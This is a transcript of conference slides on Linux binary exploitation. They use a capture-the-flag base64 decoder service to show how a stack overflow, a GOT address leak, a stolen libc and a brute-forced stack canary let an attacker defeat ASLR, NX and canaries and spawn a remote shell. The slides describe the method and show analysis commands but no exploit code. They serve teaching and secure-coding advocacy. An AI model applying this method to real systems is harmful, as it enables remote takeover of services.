linux binary analysis and exploitation
TRANSCRIPT
© 2016 Fraunhofer USA, Inc. Center for Experimental Software Engineering
Linux Binary Analysis and ExploitationDharma Ganesan, Mikael Lindvall
© 2016 Fraunhofer USA, Inc. Center for Experimental Software Engineering2
Context of the slides
Gave a presentation: NASA Coding Summit Held at NASA’s IV&V Center
NASA systems & context are removed in these slides Too sensitive for public release Increases the risk of attacks on those systems
Slides meant to be a teaser on this topic Many low-level nitty-gritty details are left-out Time-restriction (only 30 min. original talk)
© 2016 Fraunhofer USA, Inc. Center for Experimental Software Engineering3
Keywords (used in our exploit)
Return-Oriented Programming Address Space Randomization (ASLR) Non-Executable Stack (NX) Attacking a Global Offset Table (GOT) Stealing Remote Libc Stealing Stack Canary
© 2016 Fraunhofer USA, Inc. Center for Experimental Software Engineering4
Attack Scenarios and Our Scope
Scenario 1: Open-source software E.g. Linux, Apache Web-server, etc.
Scenario 2: Open-binary but closed source E.g. Most commercial products
Scenario 3: Closed-binary and closed source E.g. Remote services
Scope of this talk: Scenario 2 (remote exploit)
© 2016 Fraunhofer USA, Inc. Center for Experimental Software Engineering5
Questions
Many modern operating systems (OS) have built-in security features more on this later
Is it possible to circumvent these security features and take over a remote machine?
Do we still have to do secure coding even though OS has security features?
Let’s investigate these questions for Linux Although highly relevant for other Oses!
© 2016 Fraunhofer USA, Inc. Center for Experimental Software Engineering6
Modern OS security features (samples)
Address Space Layout Randomization (ASLR)
Non-Executable Stack (NX)
Stack Canary
© 2016 Fraunhofer USA, Inc. Center for Experimental Software Engineering7
ASLR feature for security
Historically, memory addresses of variables and functions did not change between runs
Allows hackers to perform remote code execution easily Address space layout randomization (ASLR)
randomizes many items: Address of variables differ between runs
(e.g. buffer addresses are difficult to predict for hackers)
Address of shared-libraries/dlls differ between runs (e.g. address of library functions difficult for hackers to
predict)
© 2016 Fraunhofer USA, Inc. Center for Experimental Software Engineering8
Non-Executable stack (NX) for security
Historically, hackers send exploits using the user input buffer
Modify the control the flow by redirecting the control to the buffer
Non-executable stack (NX) will not allow code execution on stack If a hacker stores his exploit (e.g. virus) on a
stack, OS will not run that code
© 2016 Fraunhofer USA, Inc. Center for Experimental Software Engineering9
Stack Canary for security
Historically, when hackers overflow a buffer and modify the control flow, the OS was not aware of this hacking event
Stack canary (a random key) can detect this issue The random key generated by the runtime linker is
inserted into the stack to maintain control flow integrity One cannot override the return addresses, stored
on the stack, without guessing the canary!
© 2016 Fraunhofer USA, Inc. Center for Experimental Software Engineering10
Questions
Many modern operating systems (OS) have built-in security features more on this later
Is it possible to circumvent these security features and take over a remote machine?
Do we still have to do secure coding even though OS has security features?
Let’s investigate these questions for Linux Although highly relevant for other Oses!
© 2016 Fraunhofer USA, Inc. Center for Experimental Software Engineering11
High-level procedure for analysis of binary
Assumption: Remote service binary is available to the hacker but the environment is not
Step 1: Data gathering about the target binary Step 2: Analyze binary for vulnerable library functions, signatures Step 3: Reachability analysis of vulnerable library functions Step 4: Memory layout analysis of the binary and remote machine Step 5: Stealing the remote’s Libc, the Stack Canary Step 6: Construct evil input that will take over the remote machine
© 2016 Fraunhofer USA, Inc. Center for Experimental Software Engineering12
Applying the procedure: An example
Context: This service is part of a capture-the-flag online challenge (ringzero.com)
About the remote service (base 64 decoder service): The remote service listens for input on a particular port It outputs base 64 decoding for the given input The binary of the remote service is available for
download But not the running environment such as libc libraries nor OS
600 assembly instructions (x86-64)
© 2016 Fraunhofer USA, Inc. Center for Experimental Software Engineering13
Applying the procedure: An example
Challenge: Break into this remote service Perform remote code execution by exploiting
vulnerabilities in the binary Steal secrets (i.e. flag file) from the server by
reading the file system of the server
© 2016 Fraunhofer USA, Inc. Center for Experimental Software Engineering14
Step 1: Data gathering of the remote service
Tools: readelf and grep What is the OS, machine, and processor type of the remote service?
dharma@ubuntu:~$ readelf -hn <binary> Data: 2's complement, little endian OS/ABI: UNIX - System V Machine: Advanced Micro Devices X86-64 OS: Linux, ABI: 2.6.24
Unfortunately, my OS version is different from the remote service But we will overcome this problem (discussed later)
Is the stack executable? dharma@ubuntu:~/Downloads$ readelf -lW <binary>| grep GNU_STACK Output: GNU_STACK ... RW 0x10 RW means the stack is read and write only but not executable
© 2016 Fraunhofer USA, Inc. Center for Experimental Software Engineering15
Step 1: Data gathering of the remote service
Is there a stack canary that will kick me out if I overflow any buffers?
Tools used: objdump, grep
Dump of assembler code for function doprocessing:
0x0000000000400eaa <+318>: mov -0x8(%rbp),%rax
0x0000000000400eae <+322>: xor %fs:0x28,%rax
0x0000000000400eb7 <+331>: je 0x400ebe <doprocessing+338>
0x0000000000400eb9 <+333>: callq 0x400930 <__stack_chk_fail@plt>
Stack canary is generated at runtime and stored in the fs register
Unfortunately, there is a built-in stack integrity check
stack_chk_fail will be called if I corrupt the stack
© 2016 Fraunhofer USA, Inc. Center for Experimental Software Engineering16
Step 2: Analyze the binary for vulnerable library functions?
Tools used: objdump and grep Which external functions are used?
dharma@ubuntu:~$ objdump –R <binary> Output: List of library functions used by the binary
Hunt for vulnerable functions pointed me to “fork” This function is not used properly (more on this later)
No strcpy or gets usage (unlucky for the hacker)
© 2016 Fraunhofer USA, Inc. Center for Experimental Software Engineering17
Step 2: Analyze the binary for vulnerable signatures?
Is there a function in the given binary which takes two buffers as inputs but without the length of each buffer as arguments?
If yes, then the service may have memory safety issues It may be possible to overflow the buffer, modify control flow
Searching for vulnerable signature often requires disassembly of the binary in order to reconstruct signatures for each function Takes a lot of time and effort
Found vulnerable signature: base64_decode(char*, char*); Disassembled function found no bounds checking of buffer
sizes
© 2016 Fraunhofer USA, Inc. Center for Experimental Software Engineering18
Step 3: Reachability analysis
How do reach the vulnerable signature? Answering this question requires
reconstructing the call graph from the binary For example, in the remote service
vulnerable function base64_decode is called without bounds checking
Great news for the hacker – stack-based buffer overflow
© 2016 Fraunhofer USA, Inc. Center for Experimental Software Engineering19
Step 3: Reachability analysis: Manually reversed C function from
binary (sample)void doprocessing(){ char base64Out[0x200]; char userInput[0x400];
bzero(base64Out, 0x200); bzero(userInput, 0x400); write(1, "Please enter your base 64 string: \n", 0x23); read(0, userInput, 0x400); write(1, "Your message is:\n", 0x11); write(1, base64Out, base64_decode(userInput, base64Out)); /* base64_decode is not checking the decoded buffer size */ write(1, "\nThank you for using ringzer0 base64 decoder!\n", 0x2e);}
• Base64_decode can corrupt the return address of doprocessing• Remote code execution: If the base 64 decoded string exceeds the buffer size
© 2016 Fraunhofer USA, Inc. Center for Experimental Software Engineering20
Step 4: Memory layout analysis
Finding the vulnerability is a small part of the puzzle Exploiting the vulnerability is the tricky part We need to understand the memory layout of the remote
service from its binary in order to do remote code execution
Is the address space layout randomization (ASLR) turned on in the remote machine?
Do answer this question: We need to find a way to leak memory addresses from the remote machine to our machine
© 2016 Fraunhofer USA, Inc. Center for Experimental Software Engineering21
Step 4: Leaking memory addresses of the remote service
Every Linux binary has a table called Global Offset Table (GOT) GOT contains pointers that will point to runtime addresses of library
functions Goal: Print the GOT entries of the remote service! We can modify the control flow of doProcessing function due to buffer
overflow We will overwrite the return address of doProcessing by the write
function address and pass a GOT entry address to appropriate registers (rsi register) This step is performed using Return-oriented programming (ROP)
Running the remote service two times showed different addresses – ASLR is ON – not easy to hack the remote server
© 2016 Fraunhofer USA, Inc. Center for Experimental Software Engineering22
Step 5: Stealing the remote’s Libc
Libc is turning-complete – meaning we can construct any algorithm from the fragments of libc
Since the remote service is vulnerable to memory errors, we are able to read arbitrary memory of the remote service!
This vulnerability allowed us to write a program that secretly transfers the remote service’s libc binary This solved the problem that the remote server has a
different runtime versions of libc and GCC
© 2016 Fraunhofer USA, Inc. Center for Experimental Software Engineering23
Step 5: Stealing the stack canary
The stack canary prevents remote code execution! Goal: Steal the stack canary by guessing 1 byte at a time Approach: A stack canary is 8 byte, require 8x256 guesses The binary has a fork-based vulnerability – a design flaw
The parent remote service spawns a child task using the fork syscall
But, all child tasks inherit the same stack canary Thus, we wrote a program that will correctly guess the stack
canary in 8x256 attempts.
© 2016 Fraunhofer USA, Inc. Center for Experimental Software Engineering24
Step 6 – Constructing the evil input that spawns a remote shell
In our case, we want to spawn a remote shell using the vulnerable remote service Using return-oriented programming (ROP) – a
hacking technique We wrote a program that constructs ROP gadgets
using the stolen libc We get a backdoor into the remote system! Please talk to me for more details!
only 30 min talk
© 2016 Fraunhofer USA, Inc. Center for Experimental Software Engineering25
Conclusion
Memory errors are very dangerous even if a remote machine is running on a custom-built environment! Hackers can steal, reconstruct, exploit our environment
Secure OS features are necessary but not sufficient We were able to defeat ASLR, NX, and Stack Canaries
Secure coding is mandatory; OS cannot always protect us if our coding is not secure
One main security requirement: input validation Extensive off-nominal testing/verification is required!
© 2016 Fraunhofer USA, Inc. Center for Experimental Software Engineering26
Future work
Our binary analysis is semi-manual More automation/research is needed for
binary reverse engineering Reachability analysis is effort intensive Generating a remote shell spawning evil input is the most
challenging part of exploit generation We have some ideas for how to do this!
© 2016 Fraunhofer USA, Inc. Center for Experimental Software Engineering
Linux Binary Analysis and Exploitation
Dharma Ganesan, Mikael Lindvall
Fraunhofer Center for Experimental Software EngineeringCollege Park, Maryland, USA
{dganesan, mlindvall}@fc-md.umd.edu